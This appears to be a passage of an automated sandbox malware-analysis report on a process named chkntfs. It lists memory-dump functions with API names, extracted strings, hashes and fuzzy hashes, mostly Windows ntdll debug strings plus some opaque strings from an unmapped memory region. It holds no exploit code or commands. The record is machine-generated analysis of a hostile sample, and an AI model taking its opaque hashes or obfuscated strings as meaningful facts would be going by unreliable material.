                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: a540904c48a05cb862952a6230e1619c7a5b746530d9eebccee92f752ebb801e
                                                                      • Instruction ID: 29e2a2126cd35f529ddaa413e97aa84cd0e191723f966af5d4933bb9a55b0d51
                                                                      • Opcode Fuzzy Hash: a540904c48a05cb862952a6230e1619c7a5b746530d9eebccee92f752ebb801e
                                                                      • Instruction Fuzzy Hash: 7B51E6A5F00516BFDF60DF989C9057EF7B8BB08204B18826FE559D7641E2B4FE018BA0
                                                                      Function 04532410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: f911e5fa77ffa446d502ce397d6eb3a4abd6eae9927d52f3e9c8244b7bb5720f
                                                                      • Instruction ID: ed5ef473e4c3b381d0fc726f5da848c26cd9e45f1d05141e227790d5437a8670
                                                                      • Opcode Fuzzy Hash: f911e5fa77ffa446d502ce397d6eb3a4abd6eae9927d52f3e9c8244b7bb5720f
                                                                      • Instruction Fuzzy Hash: CE51F471A00A45AFDF20DF5DD89097EB7F8BB44205F04889AF595D7641E674FA00EB60
                                                                      Function 044B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 044F4787
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 044F4655
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 044F4725
                                                                      • Execute=1, xrefs: 044F4713
                                                                      • ExecuteOptions, xrefs: 044F46A0
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044F46FC
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 044F4742
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: e96e360d0f8a62bec27df6cec7e709e9f7cdac5f95b326fc1c6992aa513ba471
                                                                      • Instruction ID: 92bae524e9ea30dc4e42a94919bdf0505301d3eaae79aa2057ff66616e0eaed3
                                                                      • Opcode Fuzzy Hash: e96e360d0f8a62bec27df6cec7e709e9f7cdac5f95b326fc1c6992aa513ba471
                                                                      • Instruction Fuzzy Hash: 255129356002197BEF20AAA5DC85FEE77A8FF44314F1400AFD645A7281EB70BE459FA0
                                                                      Function 04556940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                      • Instruction ID: 6cce85106d8fe44f8e6b0bc9d70b90653b86ea654d0fb1699480a877cb500a1c
                                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                      • Instruction Fuzzy Hash: 2A022671508381AFD704CF29C4A0A6FBBE5FFC8714F44892EB9998B264DB31E905DB42
                                                                      Function 044CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction ID: 16afc1e51a8a5eeb0196cc8f64ac851d8e1b4acd2d475bda9dfedab028201988
                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction Fuzzy Hash: 8881CF38E462898ADFA48E68E8927FEBBB1EF45310F1C411FD851A7391D734B8418B61
                                                                      Function 045320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      • Opcode ID: 6732f7462bbd6d306a97e19a9eef150db874487b87e9635884a7d4aeff03b29a
                                                                      • Instruction ID: ec40fb019dc11e34893981280ce8ac70db92791b2e1bd9f3a747eef3243d5b19
                                                                      • Opcode Fuzzy Hash: 6732f7462bbd6d306a97e19a9eef150db874487b87e9635884a7d4aeff03b29a
                                                                      • Instruction Fuzzy Hash: 4D215176A00619ABDB20DFA9DD54AEEB7F8EF44745F04016AF905E3201E730E9019BA1
                                                                      Function 042A3A90 Relevance: 7.5, Strings: 6, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ma#$&;(1$'- 5$3$H$ma%$
                                                                      • API String ID: 0-1881785983
                                                                      • Opcode ID: f0f70a53993f002c255d974eff043295aa552179a1b75f50dfdf67b8424f2ce2
                                                                      • Instruction ID: 476f7387fd805191d61029e65aa755b93c4f4f22f471e20f4c449377254eabe5
                                                                      • Opcode Fuzzy Hash: f0f70a53993f002c255d974eff043295aa552179a1b75f50dfdf67b8424f2ce2
                                                                      • Instruction Fuzzy Hash: F8F0B4701187844BD709AF14D448AAABAE0FF8934DF401B5DE8CDCB252EB78C644CB46
                                                                      Function 044AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044F02E7
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044F02BD
                                                                      • RTL: Re-Waiting, xrefs: 044F031E
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      • Opcode ID: b0e77b065fcf85c047fa5eaf324aca6fe2eabf4a6ca34f4eec064624ea99a27c
                                                                      • Instruction ID: 2b3b4358b288f4165fa69bf185cd9d7f772d656d32a3a87a241033520305beac
                                                                      • Opcode Fuzzy Hash: b0e77b065fcf85c047fa5eaf324aca6fe2eabf4a6ca34f4eec064624ea99a27c
                                                                      • Instruction Fuzzy Hash: E2E1C0746047419FEB25CF28C884B2AB7E0BB98314F144A2EF5958B3E1E774F859CB52
                                                                      Function 044BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RTL: Resource at %p, xrefs: 044F7B8E
                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 044F7B7F
                                                                      • RTL: Re-Waiting, xrefs: 044F7BAC
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 0-871070163
                                                                      • Opcode ID: 1ae035cd1bbaa4df615d66cb06caef83d27182dc722d351b2e3ded354058dbd5
                                                                      • Instruction ID: 91676fe1ed9c21d85270355283fbd37e7f350c779c15900d43bf94faee5a0697
                                                                      • Opcode Fuzzy Hash: 1ae035cd1bbaa4df615d66cb06caef83d27182dc722d351b2e3ded354058dbd5
                                                                      • Instruction Fuzzy Hash: 4A41D1357057429FEB20DE25CC40B6BB7E5EB89714F100A1EE996DB780DB71F4058BA1
                                                                      Function 044BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 044F728C
                                                                      Strings
                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 044F7294
                                                                      • RTL: Resource at %p, xrefs: 044F72A3
                                                                      • RTL: Re-Waiting, xrefs: 044F72C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 885266447-605551621
                                                                      • Opcode ID: c726792721a50642472da5c3cce5024a267786b866978b572342c4c213c74f3e
                                                                      • Instruction ID: c04a11f5149b928502a899911e265fbf1b84cd301c21952ee6050a65fc4b2cce
                                                                      • Opcode Fuzzy Hash: c726792721a50642472da5c3cce5024a267786b866978b572342c4c213c74f3e
                                                                      • Instruction Fuzzy Hash: 2B412535700242AFEF20DE65CC41F6AB7A1FB84714F10461AFA959B780DB24F802DBE1
                                                                      Function 04532300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$]:%u
                                                                      • API String ID: 48624451-3050659472
                                                                      • Opcode ID: 7b5529af1e87a2d1fd473a097799376a8386cb4e89b90a1ab1a38dcd33bfc0c8
                                                                      • Instruction ID: d12895f08a5e212a8aac03f86b244e85443dc536079167bf98bea8efb8cea3f9
                                                                      • Opcode Fuzzy Hash: 7b5529af1e87a2d1fd473a097799376a8386cb4e89b90a1ab1a38dcd33bfc0c8
                                                                      • Instruction Fuzzy Hash: DA318072A006199FDB20DE29DC50BEEB7F8FB44715F54459AE849E3200EB30BA459BA1
                                                                      Function 044C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-
                                                                      • API String ID: 1302938615-2137968064
                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction ID: b94a3f6ca784897d6b3171bae129dbfa963181215f97e66621b1cd6369298d21
                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction Fuzzy Hash: AA915279A00217DBEFA4DE6AC8816BFB7A5AF44721F1C451FE855A73C0E730A9418F60
                                                                      Function 04489126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      • Opcode ID: bee4318dbf0962681beebf1b361bbb32eb9f7f2c5ac7af9057e1a3dba26c1ed4
                                                                      • Instruction ID: 0f33fd659923a6da6df44dd4deb26e0c4660aea8a6a731d26c84a5e0f94883fc
                                                                      • Opcode Fuzzy Hash: bee4318dbf0962681beebf1b361bbb32eb9f7f2c5ac7af9057e1a3dba26c1ed4
                                                                      • Instruction Fuzzy Hash: 96811AB1D006699BDF319B55CC44BEEB6B8BB08714F0441EBA909B7240E770AE859FA0
                                                                      Function 0450CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0450CFBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: CallFilterFunc@8
                                                                      • String ID: @$@4Cw@4Cw
                                                                      • API String ID: 4062629308-3101775584
                                                                      • Opcode ID: 4db62b9b4cad270bca7ddf2c99c79a51fa90c6d6340e3b17181ac7e1b6b6660f
                                                                      • Instruction ID: b708123bf683670dd75330e535cec1155f1fe05ced51c3855d8d0dff72aa0851
                                                                      • Opcode Fuzzy Hash: 4db62b9b4cad270bca7ddf2c99c79a51fa90c6d6340e3b17181ac7e1b6b6660f
                                                                      • Instruction Fuzzy Hash: 7A41CF75900214DFEF219FA5E840AAEBBF8FF45B14F00852EE905DB295E774E804EB61
                                                                      Function 042A3A38 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: '0$2x49$Z%lg$lg$\
                                                                      • API String ID: 0-144640928
                                                                      • Opcode ID: 010db89e9fa414004482d366cc169a8b047d7d85f26668a0921655e3cd305815
                                                                      • Instruction ID: c7c1e47964108c8e93467d53819f2865ba6f35e3192d45a0d27a579a41500a10
                                                                      • Opcode Fuzzy Hash: 010db89e9fa414004482d366cc169a8b047d7d85f26668a0921655e3cd305815
                                                                      • Instruction Fuzzy Hash: 1AF030341287844BD708EB18C41565ABBD0FF9870CF804A5DE8CDDA291EA79D646C78B